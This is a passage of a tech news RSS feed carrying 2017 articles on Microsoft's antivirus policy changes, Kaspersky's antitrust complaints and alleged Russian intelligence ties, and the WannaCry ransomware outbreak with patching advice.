Microsoft would then allegedly disable the incompatible antivirus software after a Windows update and obscure the third-party antivirus notifications, which ended up reducing these companies’ revenue.</span></p><h2 id="microsoft-changes-antivirus-policies">Microsoft Changes Antivirus Policies</h2><p><span>In a recent post, Microsoft claimed that it has been working closely with antivirus partners such as Kaspersky, and the recent discussions it has been having with them have led to some changes that will be implemented in the <a href="https://www.tomshardware.com/news/microsoft-windows-fall-creators-update,34390.html">Windows 10 Fall Creators’ Update</a>.</span></p><p><span>One of the changes is working more closely with third-party antivirus companies to make their software compatible with the latest Windows update. Microsoft said that Windows customers should expect compatibility issues for their preferred third-party antivirus software to be resolved before they receive a new Windows update. </span></p><p><span>Microsoft will also increase the time its antivirus partners have to review a new Windows update before it’s rolled out to users. </span></p><p><span>The company will also allow antivirus vendors to set their own notifications for subscription expiration, which should increase the antivirus vendors’ revenues. </span></p><p><span>Microsoft said it has also changed how users will be warned when an antivirus program has expired and no longer protects them. Until now, Windows would show a warning only once, which users could easily ignore. 
Starting with the Windows 10 Fall Creators’ Update, the warning will persist until users decide whether to renew their third-party antivirus subscription or stick with the free Windows Defender.</span></p><p><span>Microsoft said it appreciated the feedback Kaspersky and other antivirus partners gave it, although one could say these changes might not have happened had Kaspersky not filed not just the first antitrust complaint in Russia, but also the second one in the European Union. </span></p><p><span>What matters in the end is that users are the ones benefiting most from this back and forth between Microsoft and the antivirus companies. If user security suffered because Microsoft kept prioritizing its own antivirus tool over the competition, then changes should indeed have been made. </span></p><p><span>However, if Windows users' security is weakened because of this catering to third-party antivirus vendors, then those changes would not be as welcome. In this case, the changes don’t seem to affect users negatively much, and may in fact end up benefiting them in the long term if strong competition is maintained between Microsoft’s own security solutions and those of the third-party antivirus providers. </span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky's Ties To Russian Intelligence Questioned Once Again ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-ties-russian-intelligence-questioned,34995.html</link>
                                                                            <description>
                            <![CDATA[ Of particular concern is a program that saw Kaspersky Lab employees accompany FSB agents on physical raids. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">eFZkd5bKUCV2DB8PD6Ce3N</guid>
                                                                                                                            <pubDate>Thu, 13 Jul 2017 16:25:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 08:59:33 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                                        <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" mos="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>Questions about Kaspersky Lab's relationship to the Russian government have been raised once again, this time because leaked emails show that the antivirus company has secretly helped the FSB intelligence agency respond to distributed denial-of-service (DDoS) and other attacks.</p><p>Of particular concern is a program that saw Kaspersky Lab employees accompany FSB agents on physical raids. Bloomberg <a href="https://www.bloomberg.com/news/articles/2017-07-11/kaspersky-lab-has-been-working-with-russian-intelligence">reported that the antivirus company</a> would help the Russian government defend against cyber attacks, gather information about the attackers, and then help with "banging down the doors" when the attackers were found. The first two steps aren't that surprising--security companies often assist government agencies with responding to cyber attacks--but sending employees out alongside government officials and police on physical raids is unusual.</p><p>Bloomberg said it received leaked emails from 2009 in which Kaspersky Lab CEO Eugene Kaspersky discussed the program with senior staff. 
Kaspersky (the man) summarized the project in one of the emails: "The project includes both technology to protect against attacks (filters) as well as interaction with the hosters (‘spreading’ of sacrifice) and active countermeasures (about which, we keep quiet) and so on." Bloomberg said Kaspersky Lab confirmed the emails' legitimacy; the company has disputed that claim and said the emails were never shown to it.</p><p>Kaspersky Lab <a href="https://usa.kaspersky.com/about/press-releases/2017_kaspersky-lab-response-clarifying-inaccurate-statements-published-in-bloomberg-businessweek-on-july-11-2017">published a response</a> to the report that starts with:</p><p>“Regardless of how the facts are misconstrued to fit in with a hypothetical, false theory, Kaspersky Lab, and its executives, do not have inappropriate ties with any government. The company does regularly work with governments and law enforcement agencies around the world with the sole purpose of fighting cybercrime. In the internal communications referenced within the recent article, the facts are once again either being misinterpreted or manipulated to fit the agenda of certain individuals desperately wanting there to be inappropriate ties between the company, its CEO and the Russian government, but no matter what communication they claim to have, the facts clearly remain there is no evidence because no such inappropriate ties exist.”</p><p>Perhaps an even more interesting aspect of Bloomberg's report is the claim that Kaspersky Lab wanted to make these tools available to the private sector. One of the most pressing questions in the cybersecurity space is when it's appropriate to "hack the hackers." Responding to attacks is no easy feat--they're often hard to attribute to any particular group. 
Many are conducted by nation-state actors, which limits companies' ability to respond, and many companies don't have the skills required to "hack back" when they suffer a cyber attack.</p><p>Having a Russian security company with reported connections to the FSB assist with those attacks would only further muddy the waters. Yet it could still appeal to businesses that want to be more proactive in their cybersecurity. (The best defense is a good offense, etc.) Right now it can be hard to punish cyber attackers, which makes conducting hacks a relatively low-risk prospect. Questions about the morality and legality of hacking the hackers aside, responding with attacks of their own could deter other efforts, and that could be good for companies' bottom lines.</p><p>Kaspersky Lab also addressed those claims in its statement:</p><p>Hacking back is illegal, and Kaspersky Lab has never been involved in such activities; and instead we are actively participating in joint shut-down of botnets led by law enforcements of several countries where the company provides technical knowledge (for example: https://www.interpol.int/News-and-media/News/2015/N2015-038).</p><p>This isn't the first time Kaspersky Lab's ties to the Russian government have been questioned, and it almost certainly won't be the last. The Associated Press reported in May that the FBI is currently investigating the company's relationship with the FSB and other intelligence agencies. (Kaspersky Lab <a href="https://www.tomshardware.com/news/kaspersky-denies-allegations-russian-intelligence,34370.html">denied the allegations</a> and said that it will assist with the investigations.) Other reports have claimed that the antivirus company regularly hires people from the Russian government, which could indicate a close relationship with its staffers' former employers.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Microsoft Reacts To Kaspersky's Antitrust Complaints ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/microsoft-reacts-kaspersky-antitrust-complaints,34837.html</link>
                                                                            <description>
                            <![CDATA[ Microsoft responded indirectly to Kaspersky's antitrust complaints about alleged abuse of the Windows dominance to eliminate or hurt third-party antivirus solutions. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">FDqHTyvAGpH9TuYqhXuUvJ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Tue, 20 Jun 2017 22:05:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 09:47:52 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:450px;"><p class="vanilla-image-block" style="padding-top:36.67%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png" mos="https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png" align="" fullscreen="1" width="450" height="165" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>Recently, the Russian antivirus company, Kaspersky, announced that it <a href="https://www.tomshardware.com/news/kaspersky-antitrust-microsoft-european-union,34676.html">filed a complaint</a> with the European Commission that Microsoft was abusing its dominance in the PC market to hurt antivirus companies (such as itself). Microsoft indirectly responded in a blog post talking about its partnerships with antivirus companies in general.</span></p><h2 id="kaspersky-s-complaints">Kaspersky’s Complaints</h2><p><span>Kaspersky’s main argument against Microsoft is that the company is using Windows to promote its own antivirus over other antivirus solutions, often with "underhanded tactics."</span></p><p><span>Before Windows 8, Microsoft used to develop the Microsoft Security Essentials (MSE) antivirus, which was a separate program you installed yourself, just like any other antivirus solution. 
However, starting with Windows 8, Microsoft integrated its own antivirus into the operating system by upgrading its older “Windows Defender” anti-spyware solution with MSE's antivirus capabilities.</span></p><p><span>As MSE seemed good enough to stop the majority of viruses, while silently doing its work behind the scenes, many people seemed content with it and stopped using other antivirus software. This scenario was unfavorable to Kaspersky and other antivirus companies. However, third-party antivirus companies could still claim a significantly higher rate of catching viruses in the wild.</span></p><p><span>According to Kaspersky, the real problems began when Microsoft started using questionable tactics such as:</span></p><ul><li>Uninstalling existing antivirus programs when there was a new Windows update</li><li>Reducing the time developers were given to make their antiviruses compatible with the latest update</li><li>Changing notifications in a way that hurt third-party antivirus companies’ subscription numbers</li><li>Not allowing users to permanently deactivate Windows Defender anymore, thus potentially creating conflicts with other antivirus software</li></ul><p><span>In a <a href="https://blog.kaspersky.com/microsoft-european-trial/16976/">previous post,</a> Kaspersky also mentioned that Microsoft was using questionable user interface tactics to make it look as if your PC was not secure just because Windows Defender wasn’t enabled, even if some other security solution was. However, Kaspersky said that Microsoft fixed this after it issued a complaint with the Russian Federal Antimonopoly Services.</span></p><h2 id="microsoft-s-reaction">Microsoft’s Reaction</h2><p><span>Microsoft didn’t directly call out Kaspersky in its recent blog post, but the article seems to have been targeting Kaspersky’s complaints. 
Microsoft started by reminding us about the <a href="https://www.tomshardware.com/news/nsa-links-wannacry-north-korea,34810.html">WannaCry ransomware attack</a> and others like it that put all Windows PCs at risk. As such, the company said that it’s focusing on securing Windows from top-to-bottom on its own, while also allowing third-party security solution providers to further enhance that protection. </span></p><p><span>Microsoft added that its goal with Windows Defender has been to ensure that all Windows customers have antivirus protection at all times, whether they’ve purchased or downloaded another security solution or not. </span></p><p><span>In its recent blog post, the company stated the following:</span></p><p>Microsoft supports a rich ecosystem of security partners, each attacking malware and ransomware with diverse perspectives, and continues to work with security partners to support that. As the security landscape, PC industry, and customer needs continue to evolve, Microsoft will continue to work with security partners to ensure that the broad security industry does everything possible to keep customers safe.</p><p><span>Microsoft also said that it’s been working closely with third-party software providers to ensure that their programs are compatible with the latest Windows updates months ahead of time. This statement seems to directly contradict Kaspersky’s claim that sometimes they are given early access to the new updates only two weeks before the Windows update is released.</span></p><p><span>Perhaps the issue here is that they’re talking about different types of updates. Microsoft may be talking about major upgrades, such as the recent <a href="https://www.tomshardware.com/news/microsoft-windows-10-creators-update,34111.html">Creator’s Update</a>, whereas Kaspersky may be talking about monthly patch bundles. 
Security patches can also cause other software, including antivirus programs, to stop working properly due to changes in how certain code behaves.</span></p><p><span>Microsoft also mentioned that its antivirus security is disabled when a third-party antivirus is running. However, Windows Defender will be re-enabled when the subscription for the third-party solution expires, to continue to protect users.</span></p><h2 id="avoiding-antitrust-investigations">Avoiding Antitrust Investigations</h2><p><span>As long as Microsoft doesn’t use underhanded tactics to eliminate the antivirus competition faster than it would have otherwise by simply continuing to make Windows more secure through various solutions, it should be able to steer clear of new antitrust investigations.</span></p><p><span>Microsoft got in trouble before for the Internet Explorer integration, and the European Union's solution was to force it to show users other <a href="http://europa.eu/rapid/press-release_IP-13-196_en.htm">browser options</a> upon Windows installation. If Microsoft doesn’t stray too far away from a similar solution for the antivirus software, then it may not get in trouble again over antitrust issues. However, if some of Kaspersky’s accusations end up being true, then the European Commission could still open a new antitrust investigation against Microsoft.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Files Antitrust Complaint Against Microsoft Over Windows 10 Antivirus Approach ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-antitrust-microsoft-european-union,34676.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky filed an antitrust complaint against Microsoft with both the European Union and the German Federal Cartel Office. The antivirus company believes that Microsoft has used questionable tactics to hurt third-party antivirus products. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">choNVNgdP55GTzzAF68JX6</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 06 Jun 2017 19:00:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:02 +0000</updated>
                                                                                                                                            <category><![CDATA[Windows]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Operating Systems]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" mos="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>Kaspersky announced that it has <a href="https://blog.kaspersky.com/microsoft-european-trial/16976/">filed an antitrust complaint</a> against Microsoft for disabling its antivirus service with both the European Commission and the German Federal Cartel Office. The company had previously filed an antitrust complaint against Microsoft in its home country, Russia.</span></p><h2 id="is-microsoft-abusing-its-dominant-position-again">Is Microsoft Abusing Its Dominant Position (Again)?</h2><p><span>Kaspersky argues that Microsoft has used its dominant position in the desktop operating system market to promote its own “inferior” security software at the expense of users’ previous “self-chosen” security solution. 
Kaspersky said that such promotion is made using questionable tactics, which it wants to bring to the attention of antitrust authorities.</span></p><p><span>According to Kaspersky, the earlier complaint in Russia has already led Microsoft to fix some of the issues that Kaspersky raised, despite Microsoft initially denying that it created anti-competitive conditions for third-party security solutions.</span></p><p><span>One of the questionable tactics Microsoft seems to have used is showing the Windows Defender status page in a way that made it seem like a PC wasn’t as safe as it could be because it was using an antivirus other than Microsoft’s own. </span></p><p><span>Another issue that Kaspersky raised is that the status page was also showing an orange button on which the words “Turn on” were written. Once again this made users believe that they weren’t secure unless they pressed that button and enabled Microsoft’s antivirus, even though a third-party antivirus was already enabled.</span></p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1024px;"><p class="vanilla-image-block" style="padding-top:56.84%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/pEGML2TYumRKsQrfZwPsHe.jpg" mos="https://cdn.mos.cms.futurecdn.net/pEGML2TYumRKsQrfZwPsHe.jpg" align="" fullscreen="1" width="1024" height="582" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/pEGML2TYumRKsQrfZwPsHe.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>The Russian antivirus company also complained that Microsoft intended to allow only one third-party antivirus to remain active on a system. However, this limitation was ditched. 
All the other issues mentioned so far <a href="https://eugene.kaspersky.com/2017/05/02/at-last-not-all-so-quiet-on-the-antitrust-front/">were also fixed</a> following Kaspersky’s complaint to the Russian Federal Antimonopoly Service (FAS).</span></p><h2 id="issues-not-yet-addressed">Issues Not Yet Addressed</h2><p><span>Kaspersky also complained about the fact that once upon a time Microsoft’s solution used to be a separate program you could install, just like any other third-party Windows application, but now it’s deeply integrated into Windows, to the point where home users can’t completely turn it off or delete it from their OS.</span></p><p><span>Kaspersky said that Microsoft is also limiting how the license expiration for third-party antivirus solutions is being shown on Windows, which reduced antivirus companies’ subscription revenues. Microsoft only allows the expiration notifications to appear through the new “Action Center,” which doesn’t seem to be that good (possibly on purpose) at drawing users’ attention.</span></p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:685px;"><p class="vanilla-image-block" style="padding-top:79.27%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X.jpg" mos="https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X.jpg" align="" fullscreen="1" width="685" height="543" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/cTHrynwrWQw4vD875Wgh9X.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>One other issue that Microsoft hasn’t addressed, according to the antivirus company, is that when users are upgrading their older operating systems to Windows 10, the Kaspersky antivirus seems to “disappear,” as Microsoft eliminates some drivers in the process because they aren’t compatible with 
Windows 10. </span></p><p><span>Afterwards, Microsoft replaces the Kaspersky antivirus with its own Windows Defender. Microsoft only seems to give users a warning, in passing and in a less readable font, that the Kaspersky antivirus was disabled in the upgrade process.</span></p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:484px;"><p class="vanilla-image-block" style="padding-top:33.68%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/mxp3hSom9aazpRk5RZqVmg.jpg" mos="https://cdn.mos.cms.futurecdn.net/mxp3hSom9aazpRk5RZqVmg.jpg" align="" fullscreen="1" width="484" height="163" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/mxp3hSom9aazpRk5RZqVmg.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>The main problem Kaspersky has with this is not that Microsoft decided that Kaspersky is incompatible in an arbitrary manner, but that it has reduced the developer testing time for RTM versions from a previous two months to only two weeks. This doesn’t seem to be enough time for Kaspersky, and potentially other antivirus products, to properly ensure their products are compatible with the latest version of Windows. </span></p><p><span>Perhaps this also wouldn’t be a big issue if Windows didn’t eliminate or disable programs that were somehow not 100% compatible with the latest update. After all, if Microsoft did this to all programs, most games would probably stop working on Windows a couple of years after launch, once their developers stopped releasing patches for them. 
</span></p><p><span>It’s also a little ironic that Microsoft seems to give developers only two weeks to test their applications, when it has complained in the past that even <a href="https://www.tomshardware.com/news/google-critical-windows-bug-unfixed,28294.html">three whole months</a> weren’t enough to release a patch for a Google-disclosed security flaw.</span></p><h2 id="does-kaspersky-have-a-strong-case">Does Kaspersky Have A Strong Case?</h2><p><span>We only have Kaspersky’s side of the story so far. The company does seem to raise some interesting issues, but not all of them may be backed by strong arguments. First off, it’s unclear whether Microsoft absolutely has to allow other antivirus products on its platform. </span></p><p><span>Just because this third-party antivirus market has existed in the past doesn’t necessarily give these companies a right to exist in the future. Here, we could take a look at how many companies Facebook has killed over the years, as it kept playing with its own platform rules. This issue may ultimately be decided by a court, if the case goes further, because it’s clearly not an easy question to answer. </span></p><p><span>Another example would be Google <a href="http://www.androidpolice.com/2013/03/13/breaking-google-has-begun-purging-ad-blocking-apps-from-the-play-store/">banning mobile app ad-blockers</a> from its platform. No antitrust body has started an investigation on Google over this, even though Google is already part of an <a href="http://www.reuters.com/article/us-eu-google-antitrust-idUSKCN0XH0VX">antitrust investigation</a> in the European Union, albeit for different reasons.</span></p><p><span>Ideally, Windows wouldn’t need an antivirus solution at all, and with Windows 10’s mandatory updates, there may be less of a need for one in the future. 
However, the focus may switch to other types of security solutions, such as anti-exploit tools, virtualization sandboxes, and so on.</span></p><p><span>Kaspersky is probably right that having a single vendor offer security for a platform is not a good idea in the long term. Malware creators would love that to happen because it would be much easier and much more tempting to target a single security solution on which over a billion computers rely. </span></p><p><span>If Microsoft’s end goal is to ban third-party security solutions from Windows 10, then it may indeed be in the wrong here, even if it’s legally in the right to do so. However, given Microsoft’s dominance in the OS market, it’s possible that antitrust bodies may believe that Microsoft doesn’t have a legal right to unfairly limit or ban third-party security solutions from its platform, either. </span></p><p><span>The fact that Microsoft has already begun to fix some of the issues that Kaspersky has raised in the past, and that it even has to make use of “underhanded tactics,” as Kaspersky called them, shows that Microsoft may be aware that limiting third-party antivirus choices on its platform in a more direct way isn’t going to be taken lightly either by customers or government bodies.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware Shows Devastating Potential With Disruptive Global Attack ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/wannacry-ransomware-devastating-global-attack,34406.html</link>
                                                                            <description>
                            <![CDATA[ The global attack showed that ransomware isn't just a niche type of malware that affects some random users or institutions anymore. The attacks can now spread like wildfire across organizations, representing a risk for anyone with a computer or network. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">eAcSmZaoW9o5xX2RC5wJR4</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Sat, 13 May 2017 00:05:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 08:59:14 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:816px;"><p class="vanilla-image-block" style="padding-top:75.12%;"><img id="" name="" alt="WannaCry ransom message" src="https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi.png" mos="https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi.png" align="" fullscreen="1" width="816" height="613" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/CtPSAQwfSU3piATmUKppDi.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="caption-text">WannaCry ransom message </span></figcaption></figure><p><span>A vulnerability that Microsoft <a href="https://www.tomshardware.com/news/microsoft-shadow-brokers-march-update,34157.html">silently patched in March</a>, after it <a href="https://www.tomshardware.com/news/microsoft-delays-february-security-patches,33676.html">oddly skipped</a> a whole month's worth of updates, has been used to launch a worldwide ransomware attack against at least <a href="http://www.bbc.com/news/technology-39901382">99 countries</a>, including the UK, Spain, Russia, Japan, and the United States.</span></p><p><span>The vulnerability was being exploited by the NSA</span> for potentially months or years, before the <a href="https://www.tomshardware.com/news/nsa-vulnerabilities-mini-heartbleed-cisco,32519.html">Shadow Brokers</a> group leaked it to the public. 
Once it was publicly disclosed, anyone could have leveraged it against computers that hadn’t been patched since before March.</p><h2 id="wannacry-ransomware">WannaCry Ransomware</h2><p><span><span><a href="https://www.tomshardware.com/news/ransomware-smart-cities-autonomous-cars,33093.html">Ransomware</a> is a type of malware that infects your computer, encrypts your files, and then demands a sum of money before it will decrypt them for you. In other words, it asks you for a “ransom” before it will let you access your files again.</span></span></p><p><span>One of the groups that has begun exploiting this Windows vulnerability in unpatched systems made the ransomware "WannaCry." The malware also goes by the names Wcry, Wana Decrypt0r, or WannaCryptor.</span></p><p><span>Antivirus companies such as <a href="https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today">Avast</a> and <a href="https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/">Kaspersky</a> saw many more of their users being attacked by this ransomware today than they usually do. 
One of the countries that seems to have been attacked most by the ransomware is <a href="http://abcnews.go.com/Technology/wireStory/latest-uks-health-service-hit-ransomware-attack-47372081">Russia</a>, but the UK’s <a href="http://www.bbc.com/news/uk-scotland-39896639">National Health Service</a> (NHS), Spain’s <a href="http://www.reuters.com/article/us-spain-cyber-idUSKBN1881TJ">Telefonica</a> wireless operator, and even the U.S.'s <a href="http://www.reuters.com/article/us-britain-security-hospitals-idUSKBN18820S">FedEx</a> service have also been hit, causing significant disruption.</span></p><p><span>The NHS <a href="https://digital.nhs.uk/article/1491/Statement-on-reported-NHS-cyber-attack">released a statement</a> saying that it believes the malware is tied to WannaCry and that at this stage, there is no evidence that patient data has been affected. The ransomware showed a message saying that the ransom will double if it’s not paid </span><span><span>in three days</span>. (The ransom is currently $300 worth of Bitcoin.) If seven days have passed with no ransom, the group will keep the files encrypted forever.</span></p><h2 id="ransomware-is-coming-of-age">Ransomware Is Coming Of Age</h2><p><span>Ransomware has been on a growth path over the past few years for one simple reason: It makes money for its creators. Users who get infected aren’t supposed to pay the ransom, because that would encourage the ransomware makers to keep infecting other PCs. However, not everyone listens to this advice, because some files may be worth much more than the amount of the ransom.</span></p><p><span>Up until recently, the ransomware threat <a href="http://blog.trendmicro.co.uk/new-research-uncovering-the-truth-about-ransomware/">wasn’t considered that significant</a>. The number of computers that could be affected by a particular type of ransomware was in the hundreds of thousands over a period of many months. 
That isn’t a lot, compared to the almost billion and a half Windows PCs out there. Eventually, the collective thought process seemed to go, enough systems would get patched, and the ransomware wouldn’t be able to spread anymore.</span></p><p><span>The previous type of ransomware also spread more randomly, depending on who would click on a malicious email link or who would see a malicious ad. With this latest attack, though, ransomware seems to have arrived at a point where it doesn’t just randomly infect users through malicious ads and links anymore; it can now spread quickly to and throughout large organizations and disrupt their functioning for days at a time, if not longer. </span></p><p><span>The new version of Wana Decrypt0r has reportedly infected tens of thousands of computers within hours. The number could soon grow much higher, because medical devices that run unpatched versions of Windows will likely remain vulnerable to this attack much longer.</span></p><p><span>One reason the malware was able to spread so fast is that it was designed to spread like a worm inside a network, self-replicating on all vulnerable systems. If this is the type of attack we can expect from ransomware from now on, then everyone will have to take this type of malware much more seriously. (People also need to update </span><span>their systems in a timely manner.) </span></p><h2 id="how-to-prevent-wannacry-and-other-ransomware">How To Prevent WannaCry And Other Ransomware</h2><p><span>If you haven’t installed the March patch bundle on your computer yet, it’s time to do so. Keeping your system up to date is one of the best ways to keep it secure. 
It won’t save you from malware that uses zero-day vulnerabilities, but it should keep your system safe from the vast majority of exploits that rely on publicly disclosed vulnerabilities, such as the one used by the WannaCry malware.</span></p><p><span>If for some reason you can’t patch your system, having an antivirus or <a href="https://www.tomshardware.com/news/malwarebytes-3-anti-exploit-anti-ransomware,33163.html">similar security solution</a> that has confirmed it can block the latest version of WannaCry and other ransomware would be a good way to stop it, too.</span></p><p><span>According to Cisco’s <a href="http://blog.talosintelligence.com/2017/05/wannacry.html">Talos threat intelligence team</a>, the ransomware looks for systems with ports 139 and 445 (the NetBIOS and SMB ports) open to the internet. If your organization exposes these ports, it may be time to disable them, at least until your systems are patched.</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Denies Allegations That It Aids Russian Intelligence Agencies ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-denies-allegations-russian-intelligence,34370.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky denied allegations that its security products are used by Russian intelligence agencies to harm U.S. interests or infrastructure. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">d8RpePMJCLzjegM8qRFD5B</guid>
                                                                                                                            <pubDate>Tue, 09 May 2017 23:15:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 08:57:40 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
